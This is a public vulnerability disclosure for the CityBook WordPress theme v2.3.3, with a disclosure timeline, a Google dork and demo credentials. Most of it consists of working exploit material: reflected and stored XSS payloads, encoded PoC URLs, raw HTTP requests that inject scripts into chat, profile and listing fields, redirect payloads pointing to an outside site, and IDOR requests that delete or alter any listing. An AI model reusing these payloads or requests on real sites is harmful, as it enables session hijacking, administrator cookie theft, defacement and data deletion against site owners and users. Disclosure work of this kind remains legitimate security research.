Multiple vulnerabilities was discovered in the ‘CityBook - Directory & Listing WordPress Theme’, tested version — v2.3.3: - Unauthenticated Reflected XSS - Authenticated Persistent XSS - IDOR Edit (WPScanTeam): December 27h, 2019 - Envato Contacted January 6th, 2020 - Envato Investigating January 7th, 2020 - v2.3.4 released
----[]- Info: -[]----
Google Dork: /wp-content/themes/citybook/
Date: 27/12/2019
Demo website: https://citybook2.cththemes.com/
Demo account: m0ze2/asdasd (login/password)
PoC listing: https://citybook2.cththemes.com/dashboard/?dashboard=listings
----[]- Reflected XSS: -[]----
Input field with placeholder «What are you looking for?» on the homepage is vulnerable. Any payload will be triggered three times if you use "> in front of it. Same thing with a regular search (block near website logo).
Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: <img src=x onerror=alert(document.domain)>
Payload Sample #2: <img src=x onerror=window.location=`https://m0ze.ru`;>
PoC #0: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E#038;location_search&nearby=off&address_lat&address_lng&distance=10&lcats%5B%5D=
PoC #1: https://citybook2.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=
PoC #2: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=
----[]- Persistent XSS -> Chat: -[]----
Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://citybook2.cththemes.com/dashboard/?dashboard=chats or from chat widget on the bottom right corner).
Payload Sample #0: <img src=x onerror=alert(`m0ze`)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 172
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=chats
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577594557%7C8iIk54JQ5kAHa6T7JSiVvfOBTdqUbwjbQ4N5dlpeobY%7C405cfe7009dfb008514e88229282ad33155a10e3d6d1c666e2cee90970212542; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577594557%7C8iIk54JQ5kAHa6T7JSiVvfOBTdqUbwjbQ4N5dlpeobY%7Cbc01a1bfc8e119a186128f522382374eae5a7d80a044290cfd77280880c51de0
action=citybook_addons_chat_reply&_nonce=a75ac6298d&cid=1230&user_id=785&touid=1&reply_text=%3Cimg%20src%3Dx%20onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E
Where:
user_id=XXX (your ID; in this example account «m0ze» have ID 785);
touid=1 (message receiver ID, in this example ID 1 == account «admin»);
reply_text=_payload_ (your payload text).
----[]- Persistent Self-XSS -> Profile: -[]----
Vulnerable input fields: «Phone» and «Address» (will be triggered only on https://citybook2.cththemes.com/dashboard/?dashboard=profile page for current user).
Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>
----[]- Persistent XSS -> Listing page: -[]----
Add new listing here https://citybook2.cththemes.com/submit/ (first time you need to order a «Free» plan and go to this URL again).
Vulnerable input fields: «Listing Address», «Listing Latitude», «Listing Longitude», «Email Address», «Description». «Trainers» section: «Add Member» option with «Name», «Job or Position» and «Description» vulnerable input fields. «Additional Services Fees» section: «Add Service» option with «Service Name» vulnerable input field. «Listing Address» payload also works on the admin dashboard, so it's possible to steal administrator cookies.
Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 5848
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/edit-listing/?listing_id=7610
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze2%7C1577601272%7CzdPIIYkbIF1EvBpygfJo6Sp9MO5rD5h2FRb0kSFOkb5%7C62973039250bcf64067f2d87460bc142bfc1a6623ea7c5a57cc973245fff0a97; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze2%7C1577601272%7CzdPIIYkbIF1EvBpygfJo6Sp9MO5rD5h2FRb0kSFOkb5%7C1790d7d33689fe6e21ffc2bcd001af3aa10e523b5a701b6f02944a4dd965f170; wp-settings-788=editor%3Dhtml; wp-settings-time-788=1577428516
-----------------------------18467633426500
Content-Disposition: form-data; name="lid"
7610
-----------------------------18467633426500
Content-Disposition: form-data; name="listing_type_id"
4901
-----------------------------18467633426500
Content-Disposition: form-data; name="isSubmit"
true
-----------------------------18467633426500
Content-Disposition: form-data; name="hasError"
false
-----------------------------18467633426500
Content-Disposition: form-data; name="title"
PoC
-----------------------------18467633426500
Content-Disposition: form-data; name="content"
<p><h1 style="font-size:68px;background:black;color:red;">Greetings from m0ze</h1></p>
-----------------------------18467633426500
Content-Disposition: form-data; name="thumbnail[0]"
-----------------------------18467633426500
Content-Disposition: form-data; name="cats[0]"
50
-----------------------------18467633426500
Content-Disposition: form-data; name="tags"
-----------------------------18467633426500
Content-Disposition: form-data; name="locations"
US|
-----------------------------18467633426500
Content-Disposition: form-data; name="features[0]"
64
-----------------------------18467633426500
Content-Disposition: form-data; name="features[1]"
84
-----------------------------18467633426500
Content-Disposition: form-data; name="features[2]"
66
-----------------------------18467633426500
Content-Disposition: form-data; name="features[3]"
76
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[timezone]"
America/New_York
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Monday][static]"
enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Tuesday][static]"
enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Wednesday][static]"
enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Thursday][static]"
enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Friday][static]"
enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Saturday][static]"
enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Sunday][static]"
enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="ltags_names"
m0ze
-----------------------------18467633426500
Content-Disposition: form-data; name="post_excerpt"
"><h1>Greetings from m0ze</h1>
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_address"
<!--<img src="--><img src=x onerror=(alert)(`m0zeAddr`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_latitude"
<!--<img src="--><img src=x onerror=(alert)(`m0zeLat`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_longitude"
<!--<img src="--><img src=x onerror=(alert)(`m0zeLng`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="gmap"
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_email"
<!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_phone"
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_website"
-----------------------------18467633426500
Content-Disposition: form-data; name="price_range"
moderate
-----------------------------18467633426500
Content-Disposition: form-data; name="price_from"
-
-----------------------------18467633426500
Content-Disposition: form-data; name="price_to"
-
-----------------------------18467633426500
Content-Disposition: form-data; name="listing_dates"
-----------------------------18467633426500
Content-Disposition: form-data; name="listing_dates_show_metas"
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_id]"
--imgsrc---imgsrcxonerroralertm0ze88-
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_name]"
<!--<img src="--><img src=x onerror=(alert)(`ServiceName`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_desc]"
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_price]"
-
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][name]"
<!--<img src="--><img src=x onerror=(alert)(`Membername`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][job]"
<!--<img src="--><img src=x onerror=(alert)(`MemberJob`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][desc]"
<!--<img src="--><img src=x onerror=(alert)(`MemberDesc`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="action"
submit_listing
-----------------------------18467633426500
Content-Disposition: form-data; name="_wpnonce"
82b818f99a
-----------------------------18467633426500--
----[]- IDOR #0: -[]----
Delete any post/page/listing:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 84
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C5958646454ea6fce0436f799b43314427bbf1336415aedc7eccfc1327da8c45f; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C073f75d0412d7acbadd7fbc55d1524cf46e4625206c12b0832694ad3bb96689d; wp-settings-785=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-785=1577404779
Pragma: no-cache
Cache-Control: no-cache
lid=1770&action=citybook_addons_delete_listing&_nonce=ffb1991cee&_wpnonce=ffb1991cee
Where:
lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for <body> tag).
----[]- IDOR #1: -[]----
Remove the «Featured» option for any listing:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C5958646454ea6fce0436f799b43314427bbf1336415aedc7eccfc1327da8c45f; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C073f75d0412d7acbadd7fbc55d1524cf46e4625206c12b0832694ad3bb96689d; wp-settings-785=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-785=1577404779
lid=1739&lfeatured=true&action=citybook_addons_featured_listing&_nonce=ffb1991cee&_wpnonce=ffb1991cee
Where:
lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for <body> tag).